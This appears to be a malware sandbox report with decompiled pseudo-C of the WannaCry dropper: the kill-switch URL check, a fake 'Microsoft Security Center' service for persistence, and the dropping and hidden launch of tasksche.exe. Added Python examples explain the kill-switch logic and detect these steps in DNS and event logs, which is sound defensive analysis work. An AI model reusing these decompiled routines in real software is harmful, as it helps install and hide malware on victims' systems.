            				struct _SERVICE_TABLE_ENTRY _v16;
            				long _t6;
            				void* _t19;
            				void* _t22;
            
            				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
            				__imp____p___argc();
            				_t26 =  *_t6 - 2;
            				if( *_t6 >= 2) {
            					_t19 = OpenSCManagerA(0, 0, 0xf003f);
            					__eflags = _t19;
            					if(_t19 != 0) {
            						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
            						__eflags = _t22;
            						if(_t22 != 0) {
            							E00407FA0(_t22, 0x3c);
            							CloseServiceHandle(_t22);
            						}
            						CloseServiceHandle(_t19);
            					}
            					_v16 = "mssecsvc2.0";
            					_v12 = 0x408000;
            					_v8 = 0;
            					_v4 = 0;
            					return StartServiceCtrlDispatcherA( &_v16);
            				} else {
            					return E00407F20(_t26);
            				}
            			}

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
            • __p___argc.MSVCRT ref: 004080A5
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
            • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6FFDFB10,00000000,?,004081B2), ref: 004080DC
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
            • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
            • String ID: mssecsvc2.0
            • API String ID: 4274534310-3729025388
            • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
            • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E00408090() {
            				char* _v4;
            				char* _v8;
            				intOrPtr _v12;
            				struct _SERVICE_TABLE_ENTRY _v16;
            				long _t6;
            				int _t9;
            				void* _t19;
            				void* _t22;
            
            				_t6 = GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\MSNRf9dZ63.exe", 0x104);
            				__imp____p___argc();
            				_t26 =  *_t6 - 2;
            				if( *_t6 >= 2) {
            					_t19 = OpenSCManagerA(0, 0, 0xf003f);
            					__eflags = _t19;
            					if(_t19 != 0) {
            						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
            						__eflags = _t22;
            						if(_t22 != 0) {
            							E00407FA0(_t22, 0x3c);
            							CloseServiceHandle(_t22);
            						}
            						CloseServiceHandle(_t19);
            					}
            					_v16 = "mssecsvc2.0";
            					_v12 = 0x408000;
            					_v8 = 0;
            					_v4 = 0;
            					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
            					return _t9;
            				} else {
            					return E00407F20(_t26);
            				}
            			}

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MSNRf9dZ63.exe,00000104,?,004081B2), ref: 0040809F
            • __p___argc.MSVCRT ref: 004080A5
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
            • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6FFDFB10,00000000,?,004081B2), ref: 004080DC
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
            • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
            • String ID: C:\Users\user\Desktop\MSNRf9dZ63.exe$mssecsvc2.0
            • API String ID: 4274534310-374102796
            • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
            • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			_entry_(void* __ebx, void* __edi, void* __esi) {
            				CHAR* _v8;
            				intOrPtr* _v24;
            				intOrPtr _v28;
            				struct _STARTUPINFOA _v96;
            				int _v100;
            				char** _v104;
            				int _v108;
            				void _v112;
            				char** _v116;
            				intOrPtr* _v120;
            				intOrPtr _v124;
            				intOrPtr* _t23;
            				intOrPtr* _t24;
            				void* _t27;
            				void _t29;
            				intOrPtr _t36;
            				signed int _t38;
            				int _t40;
            				intOrPtr* _t41;
            				intOrPtr _t42;
            				intOrPtr _t46;
            				intOrPtr _t47;
            				intOrPtr _t49;
            				intOrPtr* _t55;
            				intOrPtr _t58;
            				intOrPtr _t61;
            
            				_push(0xffffffff);
            				_push(0x40a1a0);
            				_push(0x409ba2);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t58;
            				_v28 = _t58 - 0x68;
            				_v8 = 0;
            				__set_app_type(2);
            				 *0x70f894 =  *0x70f894 | 0xffffffff;
            				 *0x70f898 =  *0x70f898 | 0xffffffff;
            				_t23 = __p__fmode();
            				_t46 =  *0x70f88c; // 0x0
            				 *_t23 = _t46;
            				_t24 = __p__commode();
            				_t47 =  *0x70f888; // 0x0
            				 *_t24 = _t47;
            				 *0x70f890 = _adjust_fdiv;
            				_t27 = E00409BA1( *_adjust_fdiv);
            				_t61 =  *0x431410; // 0x1
            				if(_t61 == 0) {
            					__setusermatherr(E00409B9E);
            				}
            				E00409B8C(_t27);
            				_push(0x40b010);
            				_push(0x40b00c);
            				L00409B86();
            				_t29 =  *0x70f884; // 0x0
            				_v112 = _t29;
            				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
            				_push(0x40b008);
            				_push(0x40b000); // executed
            				L00409B86(); // executed
            				_t55 =  *_acmdln;
            				_v120 = _t55;
            				if( *_t55 != 0x22) {
            					while( *_t55 > 0x20) {
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				} else {
            					do {
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            						_t42 =  *_t55;
            					} while (_t42 != 0 && _t42 != 0x22);
            					if( *_t55 == 0x22) {
            						L6:
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				}
            				_t36 =  *_t55;
            				if(_t36 != 0 && _t36 <= 0x20) {
            					goto L6;
            				}
            				_v96.dwFlags = 0;
            				GetStartupInfoA( &_v96);
            				if((_v96.dwFlags & 0x00000001) == 0) {
            					_t38 = 0xa;
            				} else {
            					_t38 = _v96.wShowWindow & 0x0000ffff;
            				}
            				_push(_t38);
            				_push(_t55);
            				_push(0);
            				_push(GetModuleHandleA(0));
            				_t40 = E00408140();
            				_v108 = _t40;
            				exit(_t40);
            				_t41 = _v24;
            				_t49 =  *((intOrPtr*)( *_t41));
            				_v124 = _t49;
            				_push(_t41);
            				_push(_t49);
            				L00409B80();
            				return _t41;
            			}

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
            • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E00408140() {
            				char* _v1;
            				char* _v3;
            				char* _v7;
            				char* _v11;
            				char* _v15;
            				char* _v19;
            				char* _v23;
            				void _v80;
            				char _v100;
            				char* _t12;
            				void* _t13;
            				void* _t27;
            
            				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
            				asm("movsb");
            				_v23 = _t12;
            				_v19 = _t12;
            				_v15 = _t12;
            				_v11 = _t12;
            				_v7 = _t12;
            				_v3 = _t12;
            				_v1 = _t12;
            				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
            				_t27 = _t13;
            				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
            				InternetCloseHandle(_t27); // executed
            				InternetCloseHandle(0);
            				E00408090();
            				return 0;
            			}

            APIs
            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
            • InternetCloseHandle.WININET(00000000), ref: 004081A7
            • InternetCloseHandle.WININET(00000000), ref: 004081AB
              • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MSNRf9dZ63.exe,00000104,?,004081B2), ref: 0040809F
              • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
            Strings
            • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
            Memory Dump Source
            • Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
            • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
            • API String ID: 774561529-2942426231
            • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
            • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
            • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
            • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
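Added example, not part of the Joe Sandbox output or of the sample: a Python model of what E00408140 does around its two WinINet calls. The listing above only shows the path the sandbox took (the second InternetCloseHandle receives 0, i.e. InternetOpenUrlA returned no handle, and E00408090 then ran); the rule that a completed fetch leads to exit instead of E00408090 is the known kill-switch behaviour of this family and is not visible in the decompiled lines. The constant names are the documented WinINet values for the raw numbers in the listing (dwAccessType 1, dwFlags 0x84000000); the DNS resolver log is constructed for the detection at the end.

```python
import re

# Strings and raw arguments taken from the E00408140 listing
KILL_SWITCH_URL = "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
KILL_SWITCH_DOMAIN = KILL_SWITCH_URL.split("//", 1)[1]

# InternetOpenA(lpszAgent, dwAccessType=1, lpszProxy, lpszProxyBypass, dwFlags)
INTERNET_OPEN_TYPE_DIRECT = 1  # do not consult the system proxy configuration

# InternetOpenUrlA(hInternet, lpszUrl, lpszHeaders, dwHeadersLength, dwFlags=0x84000000, dwContext=0)
WININET_URL_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",          # fetch from the origin, not the cache
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",  # leave no cache entry behind
}


def decode_open_url_flags(flags: int) -> list[str]:
    """Name the bits in an InternetOpenUrlA dwFlags value; unknown bits stay as hex."""
    names = [name for bit, name in WININET_URL_FLAGS.items() if flags & bit]
    leftover = flags & ~sum(WININET_URL_FLAGS)
    if leftover:
        names.append(f"0x{leftover:08x}")
    return names


def kill_switch_gate(domain_answers: bool, direct_egress: bool) -> str:
    """
    Outcome of the check for one host. InternetOpenUrlA only returns a handle
    when the HTTP request itself completes; with INTERNET_OPEN_TYPE_DIRECT the
    request never goes through a proxy, so a host that can only reach the web
    via a proxy fails the fetch even while the sinkhole answers. The listing
    never reads a response body: any completed request is enough.
    (exit-on-success is this family's documented behaviour, assumed here)
    """
    fetch_ok = domain_answers and direct_egress
    return "exit" if fetch_ok else "run E00408090"


# Constructed DNS resolver log lines for the detection below (not from the report)
SAMPLE_DNS_LOG = """\
2017-05-12T07:44:01Z client=10.0.3.17 qname=www.microsoft.com qtype=A rcode=NOERROR
2017-05-12T07:44:05Z client=10.0.3.42 qname=www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. qtype=A rcode=NOERROR
2017-05-12T07:44:06Z client=10.0.3.42 qname=WWW.IUQERFSODP9IFJAPOSDFJHGOSURIJFAEWRWERGWEA.COM qtype=AAAA rcode=NXDOMAIN
"""
_DNS_LINE = re.compile(r"client=(?P<client>\S+) qname=(?P<qname>\S+) qtype=\S+ rcode=(?P<rcode>\S+)")


def clients_querying_kill_switch(log_text: str) -> dict[str, list[str]]:
    """
    Map client -> response codes for lookups of the kill-switch name. A hit is
    worth alerting on whatever the rcode: an endpoint has no reason to look
    this name up, and whether the fetch then completed only decides whether
    E00408090 ran on that host.
    """
    hits: dict[str, list[str]] = {}
    for line in log_text.splitlines():
        m = _DNS_LINE.search(line)
        if m and m["qname"].lower().rstrip(".") == KILL_SWITCH_DOMAIN:
            hits.setdefault(m["client"], []).append(m["rcode"])
    return hits
```

The proxy caveat is the practical point of `kill_switch_gate`: the sinkhole being up does not protect a host whose only web path is an authenticating proxy, because access type 1 never uses it.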
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00407C40() {
            				char _v260;
            				void* _t15;
            				void* _t17;
            
            				sprintf( &_v260, "%s -m security", "C:\\Users\\frontdesk\\Desktop\\MSNRf9dZ63.exe");
            				_t15 = OpenSCManagerA(0, 0, 0xf003f);
            				if(_t15 == 0) {
            					return 0;
            				} else {
            					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
            					if(_t17 != 0) {
            						StartServiceA(_t17, 0, 0);
            						CloseServiceHandle(_t17);
            					}
            					CloseServiceHandle(_t15);
            					return 0;
            				}
            			}

            APIs
            • sprintf.MSVCRT ref: 00407C56
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
            • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FFDFB10,00000000), ref: 00407C9B
            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
            Strings
            • C:\Users\user\Desktop\MSNRf9dZ63.exe, xrefs: 00407C4B
            • mssecsvc2.0, xrefs: 00407C95
            • Microsoft Security Center (2.0) Service, xrefs: 00407C90
            • %s -m security, xrefs: 00407C50
            Memory Dump Source
            • Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
            • String ID: %s -m security$C:\Users\user\Desktop\MSNRf9dZ63.exe$Microsoft Security Center (2.0) Service$mssecsvc2.0
            • API String ID: 3340711343-3227993485
            • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
            • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 36%
            			E00407CE0() {
            				void _v259;
            				char _v260;
            				void _v519;
            				char _v520;
            				char _v572;
            				short _v592;
            				intOrPtr _v596;
            				void* _v608;
            				void _v636;
            				char _v640;
            				intOrPtr _v644;
            				intOrPtr _v648;
            				intOrPtr _v652;
            				char _v656;
            				intOrPtr _v692;
            				intOrPtr _v700;
            				_Unknown_base(*)()* _t36;
            				void* _t38;
            				void* _t39;
            				intOrPtr _t64;
            				struct HINSTANCE__* _t104;
            				struct HRSRC__* _t105;
            				void* _t107;
            				void* _t108;
            				long _t109;
            				intOrPtr _t121;
            				intOrPtr _t122;
            
            				_t104 = GetModuleHandleW(L"kernel32.dll");
            				if(_t104 != 0) {
            					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
            					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
            					 *0x431460 = GetProcAddress(_t104, "WriteFile");
            					_t36 = GetProcAddress(_t104, "CloseHandle");
            					_t64 =  *0x431478; // 0x75c61072
            					 *0x43144c = _t36;
            					if(_t64 != 0) {
            						_t121 =  *0x431458; // 0x75c653c6
            						if(_t121 != 0) {
            							_t122 =  *0x431460; // 0x75c61282
            							if(_t122 != 0 && _t36 != 0) {
            								_t105 = FindResourceA(0, 0x727, "R");
            								if(_t105 != 0) {
            									_t38 = LoadResource(0, _t105);
            									if(_t38 != 0) {
            										_t39 = LockResource(_t38);
            										_v608 = _t39;
            										if(_t39 != 0) {
            											_t109 = SizeofResource(0, _t105);
            											if(_t109 != 0) {
            												_v520 = 0;
            												memset( &_v519, 0, 0x40 << 2);
            												asm("stosw");
            												asm("stosb");
            												_v260 = 0;
            												memset( &_v259, 0, 0x40 << 2);
            												asm("stosw");
            												asm("stosb");
            												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
            												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
            												MoveFileExA( &_v520,  &_v260, 1);
            												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
            												if(_t107 != 0xffffffff) {
            													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
            													 *0x43144c(_t107);
            													_v652 = 0;
            													_v648 = 0;
            													_v644 = 0;
            													memset( &_v636, 0, 0x10 << 2);
            													asm("repne scasb");
            													_v656 = 0;
            													_t108 = " /i";
            													asm("repne scasb");
            													memcpy( &_v572 - 1, _t108, 0 << 2);
            													_push( &_v656);
            													memcpy(_t108 + 0x175b75a, _t108, 0);
            													_push( &_v640);
            													_push(0);
            													_push(0);
            													_push(0x8000000);
            													_push(0);
            													_push(0);
            													_push(0);
            													_push( &_v572);
            													_push(0);
            													_v640 = 0x44;
            													_v592 = 0;
            													_v596 = 0x81;
            													if( *0x431478() != 0) {
            														 *0x43144c(_v692);
            														 *0x43144c(_v700);
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return 0;
            			}

            APIs
            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FFDFB10,?,00000000), ref: 00407CEF
            • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
            • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
            • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
            • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
            • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
            • sprintf.MSVCRT ref: 00407E01
            • sprintf.MSVCRT ref: 00407E18
            • MoveFileExA.KERNEL32 ref: 00407E2C
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp
            Yara matches
            Similarity
            • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
            • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
            • API String ID: 4072214828-1507730452
            • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
            • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
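Added example, not from the report or the sample: E00407C40 and E00407CE0 above are the install chain (register and start the mssecsvc2.0 service with the sample's own path plus "-m security", then write resource 0x727 of type "R" to C:\WINDOWS\tasksche.exe after moving any existing copy to C:\WINDOWS\qeriuwjhrf, and start it hidden with "/i"). The Python below names the raw Win32 constants the decompiler printed and runs a small detector for that chain over constructed Windows event records (System log event 7045 for the service install, Sysmon events 11 and 1 for the file write and process start). The records are made up for this example; only the service name, display name, paths and arguments come from the listings. Because the service command line embeds whatever path the sample ran from, the stable indicator is the trailing argument, not a fixed path.

```python
# Raw arguments from the E00407C40 / E00407CE0 listings, named (documented Win32 values)
SC_MANAGER_ALL_ACCESS = 0x000F003F      # OpenSCManagerA dwDesiredAccess
SERVICE_ALL_ACCESS = 0x000F01FF         # CreateServiceA dwDesiredAccess
SERVICE_WIN32_OWN_PROCESS = 0x10        # CreateServiceA dwServiceType
SERVICE_AUTO_START = 0x2                # CreateServiceA dwStartType: starts at boot
SERVICE_ERROR_NORMAL = 0x1              # CreateServiceA dwErrorControl
GENERIC_WRITE = 0x40000000              # CreateFileA dwDesiredAccess
CREATE_ALWAYS = 2                       # CreateFileA dwCreationDisposition: overwrite
FILE_ATTRIBUTE_SYSTEM = 0x4             # CreateFileA dwFlagsAndAttributes
MOVEFILE_REPLACE_EXISTING = 0x1         # MoveFileExA dwFlags (tasksche.exe -> qeriuwjhrf)
CREATE_NO_WINDOW = 0x08000000           # CreateProcessA dwCreationFlags
STARTF_USESHOWWINDOW = 0x1              # STARTUPINFO.dwFlags = 0x81 is this ...
STARTF_FORCEOFFFEEDBACK = 0x80          # ... | this, with wShowWindow = 0 (SW_HIDE)

# Indicators taken from the strings in the listings
SERVICE_NAME = "mssecsvc2.0"
SERVICE_DISPLAY = "Microsoft Security Center (2.0) Service"
SERVICE_ARGS = "-m security"            # appended to the sample's own path by sprintf
DROPPED_EXE = r"C:\WINDOWS\tasksche.exe"
DROPPED_ARGS = "/i"


def check_service_install(ev: dict) -> list[str]:
    """System log 7045 (service installed): ServiceName, ImagePath, StartType, AccountName."""
    findings = []
    # 7045 carries the display name in ServiceName, so match either string
    if ev.get("ServiceName") in (SERVICE_NAME, SERVICE_DISPLAY):
        findings.append(f"service {ev['ServiceName']!r}")
    if ev.get("ImagePath", "").rstrip().endswith(" " + SERVICE_ARGS):
        findings.append(f"ImagePath ends with {SERVICE_ARGS!r}")
    if findings and ev.get("StartType", "").lower().startswith("auto"):
        findings.append("auto start")
    return findings


def check_file_create(ev: dict) -> list[str]:
    """Sysmon 11 (FileCreate): Image, TargetFilename. The MoveFileExA rename of the old copy is not a create event."""
    if ev.get("TargetFilename", "").lower() == DROPPED_EXE.lower():
        return [f"wrote {DROPPED_EXE}"]
    return []


def check_process_create(ev: dict) -> list[str]:
    """Sysmon 1 (ProcessCreate): Image, CommandLine, ParentImage."""
    findings = []
    if ev.get("Image", "").lower() == DROPPED_EXE.lower():
        findings.append("tasksche.exe started")
        if ev.get("CommandLine", "").rstrip().endswith(" " + DROPPED_ARGS):
            findings.append(f"with {DROPPED_ARGS!r}")
    return findings


CHECKS = {7045: check_service_install, 11: check_file_create, 1: check_process_create}


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (index, findings) for each record that matched a check."""
    out = []
    for i, ev in enumerate(events):
        check = CHECKS.get(ev.get("EventID"))
        findings = check(ev) if check else []
        if findings:
            out.append((i, findings))
    return out


# Constructed records (not from the report), in the order the listings would produce them
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\user\Desktop\MSNRf9dZ63.exe",
     "CommandLine": r"C:\Users\user\Desktop\MSNRf9dZ63.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 7045, "ServiceName": "mssecsvc2.0",
     "ImagePath": r"C:\Users\user\Desktop\MSNRf9dZ63.exe -m security",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\MSNRf9dZ63.exe",
     "TargetFilename": r"C:\WINDOWS\tasksche.exe"},
    {"EventID": 1, "Image": r"C:\WINDOWS\tasksche.exe", "CommandLine": r"C:\WINDOWS\tasksche.exe /i",
     "ParentImage": r"C:\Users\user\Desktop\MSNRf9dZ63.exe"},
    {"EventID": 7045, "ServiceName": "Print Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
]
```

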